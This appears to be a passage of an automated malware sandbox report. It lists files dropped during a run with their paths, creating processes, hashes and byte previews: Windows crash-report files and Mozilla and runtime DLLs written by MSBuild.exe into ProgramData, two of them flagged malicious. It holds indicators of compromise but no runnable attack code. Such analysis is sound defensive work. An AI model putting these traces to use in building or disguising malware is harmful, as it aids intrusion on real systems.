Preview:	...$... .......Y.......X\...;...{......................n.%..... 8...\|%..5...\|..h.#..... 8...\|%.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................\|.N 8...\|%.................7vSz 8...\|%..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07808501368076605
Encrypted:	false
SSDEEP:	3:qYeetYeD2gefhiM/LiMncBMnC2cvW/rmZM/YllOE/tlnl+/rTc:qGzDHefn/hn5nC25/rmW/IpMP
MD5:	DDE67659962B4007C56FA13CA20CAAB2
SHA1:	0DFE16CD819E677C91EF4DE12B135C35B84DC05D
SHA-256:	9836B5A1307A00C19132E5CD092732B964D52302A52D167408107A8469ABB85C
SHA-512:	08120BFE59BFA644EF196C54451318C6862822D0AF5635408CEF44B6EB608FD74C6FB782B244423BE6DDD82319093016EF56C15A11834798F5110FBC5AB1A3D6
Malicious:	false
Preview:	!.0&.....................................;...{...5...\|.. 8...\|%......... 8...\|%. 8...\|%..... 8...\|%.................7vSz 8...\|%.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_httpjask.powerfo_733680af354e6d03317277a863ac68ea3ea814_15a650d1_bfa85605-eeb6-451a-8463-8d97d9f02b42\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7065457568835152
Encrypted:	false
SSDEEP:	192:lfQorffTtTwg0BU/AX9jhzuiFOZ24IO8GD:CorffTtTw7BU/AX9jhzuiFOY4IO8GD
MD5:	EB8D8974E8386EB4AD61890AD309581F
SHA1:	A108978326F7A7535EF5E38BBE0A9DCE3797797D
SHA-256:	E5F90EB77B5966A7CA198C51F8EA4C8C00D7772795EC421A5C4CDB3AA0181AAF
SHA-512:	00640E4F2BEE7967CC3A61C994C8F98013E1F6DBD2BD1A90A4FFA61C77D1C966915F6470EB2EAC39CC5C95F4A6B7A63BD57F3121AF5B252F699200833A3B497E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.5.8.4.7.9.5.6.5.6.4.0.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.5.8.4.7.9.7.8.9.0.7.7.3.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.a.8.5.6.0.5.-.e.e.b.6.-.4.5.1.a.-.8.4.6.3.-.8.d.9.7.d.9.f.0.2.b.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.e.3.6.1.b.b.-.9.d.1.7.-.4.2.2.4.-.a.5.1.a.-.f.3.7.9.3.c.1.b.3.2.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.t.t.p.j.a.s.k...p.o.w.e.r.f.o.r.x.e.s...s.h.o.p.l.d.m.s.f.e.d.f.8.6.7.9.e.8.d.2...e.x.e.#.d.1.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.i.n.R.T.N.e.t.M.U.A.H.o.s.t.S.e.r.v.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.8.-.0.0.0.1.-.0.0.1.4.-.7.b.0.4.-.f.9.3.f.f.3.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.0.9.c.7.0.1.5.2.1.1.1.1.7.5.9.b.d.9.b.5.0.9.9.5.7.1.c.0.3.3.d.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER353.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6993212637640167
Encrypted:	false
SSDEEP:	96:TiZYWOv5wbYQYGWE5HuYEZsV1tNiUIxkutw1FKiabv2CMuf2JiIdI2v:2ZD5Xh0ilabvbMufeFdIc
MD5:	54858574BA93EABEB5D9E5D04BF9255B
SHA1:	0A72F361F3D8954EFBD06209A1D868F23B06D578
SHA-256:	14E7B0234C36562ED2254E79EBDD8A6186BACFC879683C5D5778036391CBF511
SHA-512:	C0FBBE3106603C6710A0710A8202D586F9A99B6A6901A12C1FA5C2FE3D82C7C5F1498173010AF48E12D67808FBA62D26D4182D962642CEA7FB3B43E7DDFC0D32
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F0F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sat Oct 5 06:53:15 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	33064
Entropy (8bit):	1.714982882904231
Encrypted:	false
SSDEEP:	96:5T8s7fFJe6qZAqCijdfANoi771zd2+sQCB6D/pAmwGN7FAjH2DuWIkWIIII4V0x7:KuPqn/OZdD/nF2H2DZV0xC+0BHt
MD5:	DEF9D8C6FED3CC41034D2A4D41E01DBF
SHA1:	5FA34CCA4EA42FBA70583BC6900615FE80D3EB3B
SHA-256:	E9293209539CBB8FD3F06CF6093927FE3663851555758BE9FA4CDBAF0F5C52DF
SHA-512:	F20CD6F7E1765EA464E2609F44E300982F38BE12AC2A3C63156C8F3FA531D8903104CE51C1F7E887E1F27E9F8BC21AF2DC21F47854A55391ACA5C17C20318E1E
Malicious:	false
Preview:	MDMP..a..... .......[..g........................d...........................T.......8...........T...............(v......................................................................................................eJ..............GenuineIntel............T...........Z..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7FBC.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8558
Entropy (8bit):	3.7032332337847933
Encrypted:	false
SSDEEP:	192:R6l7wVeJIgDA6JwzQ6YR6SUyWx0gmfzF1XprC89b2osfmQym:R6lXJIz6+k6YsSUDx0gmfzF1B2bfv
MD5:	B3FF0754837E02D8AF791B7715E1E505
SHA1:	20985217DA0EF118A79A86EC81025A95FF00E15F
SHA-256:	CB9E42FF7A83FD6BC50AD2A007589CF0CB4D9CC1D715446DB935F55DF21FD845
SHA-512:	4F694FD56CB00AB5F6CC5290EF78C3EF2D2CE1874E3B3AF37C3248BE3CFE45F5613D92698ADCC466F5F0644D4742192657019935B889A58D660911A4B7F55180
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER802A.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5011
Entropy (8bit):	4.581072877413654
Encrypted:	false
SSDEEP:	48:cvIwWl8zsvJg77aI9NyWpW8VYhhpYm8M4JkZHFMMB+q8vmZPQjBmZid:uIjfRI77T7VpJZMBK8QjB4id
MD5:	81F3DFF5B49DA49B3CD2153D72F8E271
SHA1:	92FE822F6E214448F42F29DD11BD10A37474D7B3
SHA-256:	EE09F5CA303C6F8EB516FFF37BA51D02E567EC64C216AE5AEB69F152FCDF61CC
SHA-512:	80B14D90679236A460BFD20F473195117E86C637EDBB317A6F8EE466AB0031BC0BBB736A95E3F097752FA52D66CAAEB3A2AE11652DC0B7E04791F60B71C10B6F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="529795" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8316.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	82212
Entropy (8bit):	3.0512197846978006
Encrypted:	false
SSDEEP:	1536:6MtqJU83viYy8c/vWWPcrm9QcmjJlxZ6seXD:6MtqJU83viYy8c/vWWPcrm9QcmVlxZ6x
MD5:	789F4464F17051A9DEDB7EC6A65101EA
SHA1:	BE949CBC4E8381B72DE0D11DA331258CC486227A
SHA-256:	204D869AD644E17B1980C3EB129CBEF3CA183EE3C753A0EF947623B939576DF0
SHA-512:	F41085835716484BF50B058741D5137C8A2A6EC2D7D6882437035FE4EA2F93D0E4188A3811AC61BBEC11A006D8EEEB4F1F7EB6C6627EBB2632163EC56B097CF8
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER84AE.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685251514750228
Encrypted:	false
SSDEEP:	96:TiZYWfetmCbcYNYNWXHyYEZbrtBiO4Tguw8tdZaRvZMC18tIQ+I3:2ZDfBq0O7aRvZMC18yZI3
MD5:	047EA0C6623027F2B0EA21DA1B98F0FF
SHA1:	2472C7012503A10720EEFCCB999E82E0AB751F27
SHA-256:	3A3D8AC7AAAAF8FA358335D093737B3AD3F542C00B206B8102A471B5997553FF
SHA-512:	776F9C3A3C0378B23D95188A35F9BB1EC91B9EC22B1DC79F80FAA815F2A97B9AAC97E14AA35A0BC1953B846FAA67C5161A80DE2D229A5B7EB2E35E08C9B43C31
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC879.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	91664
Entropy (8bit):	3.0558930529264208
Encrypted:	false
SSDEEP:	1536:+cdrOQZFcXeMc2I4lZA2TY+xf6teGuI+dNfCpind4zLzvEZ+v:+cdrOQZFcXeMc2I4lZA2TY+f6teGuI+C
MD5:	524391C688C7BBB553A7D9E3385F81D1
SHA1:	5E9D4A4D4375C9A3696C4F1A41F2D231E2F7E1D3
SHA-256:	0102208AFD74E0977E36032B3E62A74DDFDBD9087723EB7BE6019CD3C82A6742
SHA-512:	21349B0784F07B2A268964BEE34C6158F6D7AB4698851FC504A7C08D368536849B6E982843397AA793F2710E36E33F2DD2FC667655911FDFCECEF8ECA50D5209
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCC33.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.699469262909465
Encrypted:	false
SSDEEP:	96:TiZYWUToe1WsYRYNWlAHMYEZYOtNijIjk1wgKX5UVa7vdMMhfvjIzIo:2ZDe7GY/MKa7v+MhfvszIo
MD5:	5671ABC7F711DE0A389C96575379604C
SHA1:	5A8BB082CD78BBA20CFE1F551E6256B401DCDD0D
SHA-256:	A513AD05C0CC98061121CBEA396285891E147746E95FF722BA4A7C3630BF0794
SHA-512:	3898BC1F5F69548D464727E4123D0149713EE15874C022E7EF1ACD5149FEEBD580EC65859BD0258A4EE3B7D2684369452702B20414D4808AD6F88B80EA079780
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF6A.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	89206
Entropy (8bit):	3.0542056964494826
Encrypted:	false
SSDEEP:	1536:AEinAKvc9TX2X3jF9HxtDqRraiEktfCiJAgteYft9BV:AEinAKvc9TX2X3jF9RtDqRraiEktfCiZ
MD5:	A5DBF418025EB8D01F988698CFB0E8A4
SHA1:	8A162256C05DE3D3957773806517256C129934C5
SHA-256:	4D5FCF9D273960338F0E58D82BEF13889C323F42EC68181B3E2670CF081EB118
SHA-512:	1EC8A4C4C6E18162BF3ECF153A8117E9AC0EC7B6A2CC73460531D0028D264ED5418D3D1EC1AC5981CD35397AA283FA0E2D4833B9B214764E748E4E8861711798
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: niko.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
